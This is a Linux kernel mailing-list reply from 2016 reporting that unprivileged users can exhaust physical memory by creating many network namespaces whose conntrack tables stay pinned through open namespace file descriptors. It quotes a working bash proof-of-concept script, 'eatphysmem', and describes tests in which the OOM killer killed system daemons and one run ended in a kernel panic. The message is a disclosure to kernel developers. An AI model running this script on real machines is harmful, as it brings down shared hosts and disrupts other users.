From: yumkam@gmail.com (Yuriy M. Kaminskiy)
Subject: Re: userns, netns, and quick physical memory consumption by unprivileged user
Date: Fri, 11 Mar 2016 18:06:59 +0300
To: netdev@vger.kernel.org
Cc: containers@lists.osdl.org, linux-kernel@vger.kernel.org

ping (+ more test results at bottom)

On Wed, 02 Mar 2016, I wrote:
> While looking at CVE-2016-2847, I remembered the infamous
>   nf_conntrack: falling back to vmalloc
> message, which was often triggered by network namespace creation (the
> message was removed recently, but that changed nothing about the
> underlying problem).
>
> So, how about something like this:
>
> $ cat << 'EOF' >> eatphysmem
> #!/bin/bash -xe
> fd=6
> d="`mktemp -d /tmp/eatmemXXXXXXXXX`"
> cd "$d"
> rule="iptables -A INPUT -m conntrack --ctstate ESTABLISHED -j ACCEPT"
> # rule="$rule;$rule"
> # ... just because we can; same with any number of ip li/ro/ru/etc
> while :; do
>     let fd=fd+1
>     [ ! -e /proc/$$/fd/$fd ] || continue
>     mkfifo f1 f2
>     unshare -rn sh -xec "echo foo >f1;ip li se lo up; $rule;read r <f2" &
>     pid=$!
>     read r <f1
>     eval "exec $fd</proc/$pid/ns/net"
>     echo bar >f2
>     wait
>     rm f2 f1
>     free
>     sleep 0.1s
> done
> sleep inf
> EOF
> $ chmod a+x eatphysmem; unshare -rpf --mount-proc ./eatphysmem
> ?
>
> You can easily eat 0.5M of physical memory per netns (conntrack hash
> table (hashsize*sizeof(list_head))) and more, and pin it all to a single
> process with opened netns fds.
> What can stop it?
> ulimit? What is ulimit? Conntrack knows nothing about them.
> Ah-yeah, `ulimit -n`? 64k. 64k*512k = 32G. Per process. Oh-uh.
> OOM killer? But this is not this process's memory; if anything, it will
> be killed last.
> (I wonder if memcg can tackle it; probably yes; but how many people
> have it configured?).

I tested in a VM with kernel 4.4.2 (from a user account, with
ulimit -v 32768); as expected, it quickly ate all memory, the OOM killer
went berserk and killed even systemd-journald and systemd-udevd, but
left this process alive (and hogging all physical memory; also note that
swap was enabled, and mostly remained unused).

I also tried with memcg:

  t=/sys/fs/cgroup/memory/test1;mkdir $t;echo 0 >$t/tasks;
  echo 48M >$t/memory.limit_in_bytes; su testuser
  [...]

and it did not help at all (rather the opposite: it ended with init
killed and a kernel panic; well, the latter is pure (un)luck, but the
point is, memcg apparently *CANNOT* curb net/ns allocations).

BTW, all those hash/conntrack/etc. default sizes were calculated from
physical memory size on the assumption that there would be only *one*
instance of those tables. Obviously, the introduction of network
namespaces (and especially unprivileged user-ns) threw this assumption
out the window (and here comes that "falling back to vmalloc" message
again; in the pre-netns world, those tables were allocated *once* at
early system startup, typically with plenty of free and unfragmented
memory).
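
For reference, the back-of-the-envelope bound quoted above (64k*512k = 32G) can be checked with a few lines of shell. This is only a sketch of the arithmetic: the 512 KiB per netns is the rough estimate from the quoted message, not a measured value, 65536 stands in for the "64k" `ulimit -n` figure, and the variable names are made up for illustration.

```sh
# Rough upper bound on memory pinned through open netns fds.
# Both inputs are the estimates quoted in the message, not measurements.
per_netns_kib=512   # assumed ~0.5M of conntrack hash table per netns
max_fds=65536       # assumed `ulimit -n` ceiling ("64k")

# KiB -> MiB -> GiB
total_gib=$(( per_netns_kib * max_fds / 1024 / 1024 ))
echo "${total_gib} GiB per process"
```

Plugging in a different per-netns figure (for example, if the rule is repeated or more tables are set up in each namespace) only scales the result linearly.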